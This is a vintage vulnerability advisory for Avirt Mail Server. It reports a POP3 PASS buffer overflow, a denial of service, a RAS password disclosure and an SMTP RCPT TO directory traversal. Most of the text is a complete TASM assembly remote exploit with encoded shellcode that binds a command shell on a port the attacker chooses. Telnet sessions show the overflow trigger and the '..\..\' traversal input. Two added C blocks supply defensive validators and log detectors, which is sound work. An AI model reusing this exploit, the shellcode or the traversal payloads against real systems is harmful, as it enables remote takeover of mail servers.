COMMAND
Avirt Mail Server
SYSTEMS AFFECTED
Avirt Mail Server 3.3a or 3.5
PROBLEM
Luciano Martins found the following. Avirt Mail Server 3.3a contains a
remotely exploitable buffer overflow, and version 3.5 a denial of
service, both triggered by an overly long argument to the POP3 USER or
PASS command. The overflow may allow an attacker to execute arbitrary
code on the target server. Example:
[hell@mordoc]$ telnet example.com 110      <<<< sorry, the port is 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK aVirt Mail POP3 Server Ready
user itsme
+OK
Pass [buffer]
Where [buffer] is approximately 856 characters. At this point the server
overflows and crashes, a typical buffer overflow. Binary and source code
for the 3.3a (Windows 98) remote exploit and for the 3.5 D.o.S are
available at http://www.ussrback.com/avirtro/ ; both are packaged in
avirtsc.zip.
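As an added, defender-side example (not part of the advisory and not Avirt's code), the C program below shows the input handling that prevents this class of bug: a POP3 command parser that rejects over-long USER/PASS arguments instead of copying them into a fixed buffer, plus the same check run over captured client lines so a monitoring pipeline can flag an attempt like the session above. The limits (40-character arguments per RFC 1939, 255-octet lines per RFC 2449), the probe helper and the sample session are assumptions for the example, not values taken from Avirt.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Limits assumed for this example: RFC 1939 allows POP3 arguments of up to
 * 40 characters, RFC 2449 caps a command line at 255 octets (incl. CRLF). */
#define MAX_ARG_LEN   40
#define MAX_LINE_LEN  255

enum pop3_result {
    POP3_OK = 0,
    POP3_ERR_BAD_COMMAND,    /* not a USER/PASS line */
    POP3_ERR_LINE_TOO_LONG,
    POP3_ERR_ARG_TOO_LONG,
    POP3_ERR_BAD_CHARS
};

struct pop3_cmd {
    char   verb[5];              /* "USER" or "PASS" plus NUL */
    char   arg[MAX_ARG_LEN + 1]; /* always NUL-terminated */
    size_t arg_len;
};

/* Parse one client line into *cmd. Over-long input is rejected outright,
 * never truncated and never copied into a fixed-size buffer. */
enum pop3_result pop3_parse_line(const char *line, struct pop3_cmd *cmd)
{
    size_t n = strlen(line);
    char verb[5];

    memset(cmd, 0, sizeof *cmd);
    while (n > 0 && (line[n - 1] == '\r' || line[n - 1] == '\n'))
        n--;                                     /* drop CRLF */
    if (n < 4)
        return POP3_ERR_BAD_COMMAND;
    for (int i = 0; i < 4; i++)                  /* keywords are case-insensitive */
        verb[i] = (char)toupper((unsigned char)line[i]);
    verb[4] = '\0';
    if (strcmp(verb, "USER") != 0 && strcmp(verb, "PASS") != 0)
        return POP3_ERR_BAD_COMMAND;
    if (n > MAX_LINE_LEN)
        return POP3_ERR_LINE_TOO_LONG;
    if (n == 4 || line[4] != ' ')
        return POP3_ERR_BAD_COMMAND;

    const char *arg = line + 5;
    size_t arg_len = n - 5;
    if (arg_len > MAX_ARG_LEN)
        return POP3_ERR_ARG_TOO_LONG;
    for (size_t i = 0; i < arg_len; i++)         /* printable ASCII only */
        if (!isprint((unsigned char)arg[i]))
            return POP3_ERR_BAD_CHARS;

    memcpy(cmd->verb, verb, sizeof verb);
    memcpy(cmd->arg, arg, arg_len);
    cmd->arg[arg_len] = '\0';
    cmd->arg_len = arg_len;
    return POP3_OK;
}

/* Detection over captured client lines (e.g. from a proxy or packet log):
 * count USER/PASS commands whose argument or line exceeds the limits. */
size_t pop3_count_overlong_auth(const char *const lines[], size_t count)
{
    size_t hits = 0;
    for (size_t i = 0; i < count; i++) {
        struct pop3_cmd c;
        enum pop3_result r = pop3_parse_line(lines[i], &c);
        if (r == POP3_ERR_ARG_TOO_LONG || r == POP3_ERR_LINE_TOO_LONG)
            hits++;
    }
    return hits;
}

/* Build "<verb> " + n bytes of 'A' + CRLF and parse it; mirrors the
 * advisory's "PASS [buffer]" probe without needing a live server. */
enum pop3_result pop3_probe(const char *verb, size_t n)
{
    static char buf[2048];
    size_t vl = strlen(verb);
    if (vl + 1 + n + 3 > sizeof buf)
        return POP3_ERR_LINE_TOO_LONG;
    memcpy(buf, verb, vl);
    buf[vl] = ' ';
    memset(buf + vl + 1, 'A', n);
    memcpy(buf + vl + 1 + n, "\r\n", 3);
    struct pop3_cmd c;
    return pop3_parse_line(buf, &c);
}

#define A10 "AAAAAAAAAA"
/* Constructed sample session: the third line carries a 70-byte password. */
const char *const sample_session[] = {
    "USER itsme\r\n",
    "PASS hunter2\r\n",
    "PASS " A10 A10 A10 A10 A10 A10 A10 "\r\n",
    "STAT\r\n",
};
#define SAMPLE_SESSION_LEN 4
```

`pop3_probe("PASS", 856)` reproduces the advisory's input size and comes back as `POP3_ERR_LINE_TOO_LONG` before any byte of the argument is stored; `pop3_count_overlong_auth(sample_session, SAMPLE_SESSION_LEN)` returns 1 for the constructed session. The design point is that the verb is checked first, so the length-based result only fires on authentication commands and a log scanner does not count unrelated long lines.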
-----
An exploit for Avirt 3.5 (NT) and a temporary patch are available at
http://www.beavuh.org
The exploit spawns a command prompt on a port you specify and the
patch will prevent this particular overflow.
; The binary is available at http://www.beavuh.org.
;
; To assemble:
;
; tasm32 -ml avirtx.asm
; tlink32 -Tpe -c -x avirtx.obj ,,, import32
;
; TASM 5 required!
;
; dark spyrit <dspyrit@beavuh.org>
.386p
locals
jumps
.model flat, stdcall
extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC
.data
sploit_length equ 783
sploit:
db "PASS "
db 016h, 05bh, 05bh, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 08bh, 0feh, 033h, 0c0h, 050h, 0f7h, 0d0h
db 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h
db 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 0bbh, 099h, 0b0h, 090h, 041h, 0c1h
db 0ebh, 008h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh
db 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h
db 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach
db 084h, 0c0h, 075h, 0f9h, 0b3h, 0b0h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch
db 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h
db 051h, 056h, 052h, 0b3h, 08ch, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech
db 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
db 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 053h
db 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh
db 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h
db 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h
db 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h
db 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h
db 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h
db 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h
db 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h
db 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh
db 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h
db 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h
db 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch
db 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh
db 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h
db 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h
db 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h
db 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h
db 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch
db 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh
db 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h
db 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh
db 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h
db 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch
db 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h
db 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h
db 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch
db 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h
db 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah
db 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h
db 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h
db 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h
db 09bh, 099h
store dw ?
db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
db 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h
db 0ffh, 0ffh, 0ffh, 0ffh, 090h, 090h, 090h, 090h, 090h, 05fh, 029h, 040h
db 000h, 00dh, 00ah
user db "user beavuh",0dh,0ah,0
userl equ $-user
logo db "aVirt Mail Server 3.5 remote.", 13, 10
db "by dark spyrit <dspyrit@beavuh.org>",13,10
db "http://www.beavuh.org",13,10,13,10
db "usage: avirtx <host> <port> <port to bind shell>", 13, 10
db "eg - avirtx host.com 110 1234",13,10,0
logolen equ $-logo
errorinit db 10,"error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit
derror db 10,"error.",13,10,0
derrorl equ $-derror
nohost db 10,"no host or ip specified.", 13,10,0
nohostl equ $-nohost
noport db 10,"no port specified.",13,10,0
noportl equ $-noport
no_port2 db 10,"no bind port specified.",13,10,0
no_port2l equ $-no_port2
response db 10,"waiting for response....",13,10,0
respl equ $-response
reshost db 10,"error resolving host.",13,10,0
reshostl equ $-reshost
sockerr db 10,"error creating socket.",13,10,0
sockerrl equ $-sockerr
ipill db 10,"ip error.",13,10,0
ipilll equ $-ipill
cnerror db 10,"error establishing connection.",13,10,0
cnerrorl equ $-cnerror
success db 10,"sent.. spawn connection now.",13,10,0
successl equ $-success
console_in dd ?
console_out dd ?
bytes_read dd ?
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends
wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_port2 db 256 dup (?)
buffer db 1000 dup (0)
.code
start:
call init_console
push logolen
push offset logo
call write_console
call GetCommandLineA
mov edi, eax
mov ecx, -1
xor al, al
push edi
repnz scasb
not ecx
pop edi
mov al, 20h
repnz scasb
dec ecx
cmp ch, 0ffh
jz @@0
test ecx, ecx
jnz @@1
@@0:
push nohostl
push offset nohost
call write_console
jmp quit3
@@1:
mov esi, edi
lea edi, _host
call parse
or ecx, ecx
jnz @@2
push noportl
push offset noport
call write_console
jmp quit3
@@2:
lea edi, _port
call parse
or ecx, ecx
jnz @@3
push no_port2l
push offset no_port2
call write_console
jmp quit3
@@3:
push ecx
lea edi, _port2
call parse
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
push errorinitl
push offset errorinit
call write_console
jmp quit3
winsock_found:
xor eax, eax
push eax
inc eax
push eax
inc eax
push eax
call socket
cmp eax, -1
jnz socket_ok
push sockerrl
push offset sockerr
call write_console
jmp quit2
socket_ok:
mov sock, eax
mov sin.sin_family, 2
mov ebx, offset _port
call str2num
mov eax, edx
push eax
call htons
mov sin.sin_port, ax
mov ebx, offset _port2
call str2num
mov eax, edx
push eax
call htons
xor ax, 09999h
mov store, ax
mov esi, offset _host
lewp:
xor al, al
lodsb
cmp al, 039h
ja gethost
test al, al
jnz lewp
push offset _host
call inet_addr
cmp eax, -1
jnz ip_aight
push ipilll
push offset ipill
call write_console
jmp quit1
ip_aight:
mov sin.sin_addr, eax
jmp continue
gethost:
push offset _host
call gethostbyname
test eax, eax
jnz gothost
push reshostl
push offset reshost
call write_console
jmp quit1
gothost:
mov eax, [eax+0ch]
mov eax, [eax]
mov eax, [eax]
mov sin.sin_addr, eax
continue:
push size sin
push offset sin
push sock
call connect
or eax, eax
jz connect_ok
push cnerrorl
push offset cnerror
call write_console
jmp quit1
connect_ok:
push respl
push offset response
call write_console
xor eax, eax
push eax
push 1000
push offset buffer
push sock
call recv
or eax, eax
jg sveet
push derrorl
push offset derror
call write_console
jmp quit1
sveet:
push eax
push offset buffer
call write_console
xor eax, eax
push eax
push userl
push offset user
push sock
call send
xor eax, eax
push eax
push 1000
push offset buffer
push sock
call recv
or eax, eax
jg sveet1
push derrorl
push offset derror
call write_console
jmp quit1
sveet1:
push eax
push offset buffer
call write_console
xor eax, eax
push eax
push sploit_length
push offset sploit
push sock
call send
push successl
push offset success
call write_console
quit1:
push sock
call closesocket
quit2:
call WSACleanup
quit3:
push 0
call ExitProcess
parse proc
;cheap parsing..
lewp9:
xor eax, eax
cld
lodsb
cmp al, 20h
jz done
test al, al
jz done2
stosb
dec ecx
jmp lewp9
done:
dec ecx
done2:
ret
endp
str2num proc
push eax ecx edi
xor eax, eax
xor ecx, ecx
xor edx, edx
xor edi, edi
lewp2:
xor al, al
xlat
test al, al
jz end_it
sub al, 030h
mov cl, al
mov eax, edx
mul numbase
add eax, ecx
mov edx, eax
inc ebx
inc edi
cmp edi, 0ah
jnz lewp2
end_it:
pop edi ecx eax
ret
endp
init_console proc
push -10
call GetStdHandle
or eax, eax
je init_error
mov [console_in], eax
push -11
call GetStdHandle
or eax, eax
je init_error
mov [console_out], eax
ret
init_error:
push 0
call ExitProcess
endp
write_console proc text_out:dword, text_len:dword
pusha
push 0
push offset bytes_read
push text_len
push text_out
push console_out
call WriteConsoleA
popa
ret
endp
end start
Two more bugs concerning Avirt Gateway and Avirt Mail Server 3.3
and 3.5 follow.
1) Anybody with console access can retrieve the RAS password from
Avirt Gateway. Changing the username in the "Internet connection"
properties and pressing the "test" button makes Avirt display a
message box containing the password in plaintext.
2) Anybody on the intranet can create directories anywhere on the NT
host running Avirt Mail Server by putting a directory traversal
sequence in the SMTP RCPT TO address.
telnet 192.168.0.1 25
> 220 server aVirt Mail SMTP Server Ready.
mail from:foo
> 250 foo, Sender OK
rcpt to:..\..\..\..\newfolder
> 250 ..\..\..\..\newfolder, Receipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
Textinside
.
> 250 Mail accepted.
This will create a root folder named "newfolder" with a file
inside it. Fortunately it appears to be impossible to
overwrite an existing directory.
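As an added, defender-side example (not Avirt's code and not part of the advisory), the C code below shows the input handling that closes this hole: the recipient's local part is allow-listed before it is ever used to name a mailbox directory, the directory is always built under a fixed spool root, and the same validator doubles as a detector over captured SMTP client lines. The spool root, the 64-character local-part limit (RFC 5321) and the sample transcript are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_LOCAL 64   /* RFC 5321 limit on a local-part; assumed here */

enum rcpt_result {
    RCPT_OK = 0, RCPT_EMPTY, RCPT_TOO_LONG,
    RCPT_TRAVERSAL,   /* leading '.' or ".." anywhere */
    RCPT_SEPARATOR,   /* '/', '\\' or ':' (drive letters, UNC paths) */
    RCPT_BAD_CHAR     /* anything outside [A-Za-z0-9._-] */
};

/* Allow-list the local part of a recipient mailbox before it is used
 * as a file or directory name. Accepts "<user@host>" or a bare name. */
enum rcpt_result smtp_validate_local_part(const char *mailbox, char *local, size_t localsz)
{
    size_t n = strlen(mailbox);
    if (n >= 2 && mailbox[0] == '<' && mailbox[n - 1] == '>') {
        mailbox++;                      /* strip optional <...> */
        n -= 2;
    }
    const char *at = memchr(mailbox, '@', n);
    size_t ln = at ? (size_t)(at - mailbox) : n;
    if (ln == 0)
        return RCPT_EMPTY;
    if (ln > MAX_LOCAL || ln >= localsz)
        return RCPT_TOO_LONG;
    if (mailbox[0] == '.')
        return RCPT_TRAVERSAL;
    for (size_t i = 0; i < ln; i++) {
        unsigned char c = (unsigned char)mailbox[i];
        if (c == '/' || c == '\\' || c == ':')
            return RCPT_SEPARATOR;
        if (c == '.' && i + 1 < ln && mailbox[i + 1] == '.')
            return RCPT_TRAVERSAL;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return RCPT_BAD_CHAR;
    }
    memcpy(local, mailbox, ln);
    local[ln] = '\0';
    return RCPT_OK;
}

/* Wrapper with static storage so a result can be checked by name. */
enum rcpt_result smtp_check(const char *mailbox)
{
    static char local[MAX_LOCAL + 1];
    return smtp_validate_local_part(mailbox, local, sizeof local);
}

/* Mailbox directory = fixed spool root + validated name; the recipient
 * string is never interpreted as a path. Returns NULL on rejection. */
const char *smtp_dir_or_null(const char *spool_root, const char *mailbox)
{
    static char out[512];
    char local[MAX_LOCAL + 1];
    if (smtp_validate_local_part(mailbox, local, sizeof local) != RCPT_OK)
        return NULL;
    int w = snprintf(out, sizeof out, "%s\\%s", spool_root, local);
    return (w < 0 || (size_t)w >= sizeof out) ? NULL : out;
}

/* Detection over captured SMTP client lines: count RCPT TO commands whose
 * mailbox would be rejected for traversal or separator characters. */
size_t smtp_count_traversal_rcpts(const char *const lines[], size_t count)
{
    size_t hits = 0;
    for (size_t i = 0; i < count; i++) {
        const char *l = lines[i];
        char head[9], arg[256], local[MAX_LOCAL + 1];
        if (strlen(l) < 8)
            continue;
        for (int k = 0; k < 8; k++)       /* command keyword is case-insensitive */
            head[k] = (char)toupper((unsigned char)l[k]);
        head[8] = '\0';
        if (strcmp(head, "RCPT TO:") != 0)
            continue;
        const char *p = l + 8;
        while (*p == ' ')
            p++;
        size_t al = strlen(p);
        while (al > 0 && (p[al - 1] == '\r' || p[al - 1] == '\n'))
            al--;                         /* drop CRLF */
        if (al >= sizeof arg)
            al = sizeof arg - 1;
        memcpy(arg, p, al);
        arg[al] = '\0';
        enum rcpt_result r = smtp_validate_local_part(arg, local, sizeof local);
        if (r == RCPT_TRAVERSAL || r == RCPT_SEPARATOR)
            hits++;
    }
    return hits;
}

/* Constructed sample transcript; the second line is the advisory's traversal. */
const char *const sample_smtp[] = {
    "mail from:foo\r\n",
    "rcpt to:..\\..\\..\\..\\newfolder\r\n",
    "rcpt to:bob\r\n",
    "RCPT TO:<alice@example.com>\r\n",
    "rcpt to:C:\\Inetpub\\x\r\n",
};
#define SAMPLE_SMTP_LEN 5
```

`smtp_check("..\\..\\..\\..\\newfolder")` returns `RCPT_TRAVERSAL`, so the request from the transcript above is refused at the RCPT stage rather than at DATA time, and `smtp_count_traversal_rcpts(sample_smtp, SAMPLE_SMTP_LEN)` returns 2 for the constructed transcript (the traversal and the drive-letter attempt). An allow-list is used instead of stripping ".." because stripping leaves room for encodings and separator variants the filter did not anticipate.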
SOLUTION
No vendor fix yet. For a workaround (the temporary patch), see the
address above (http://www.beavuh.org).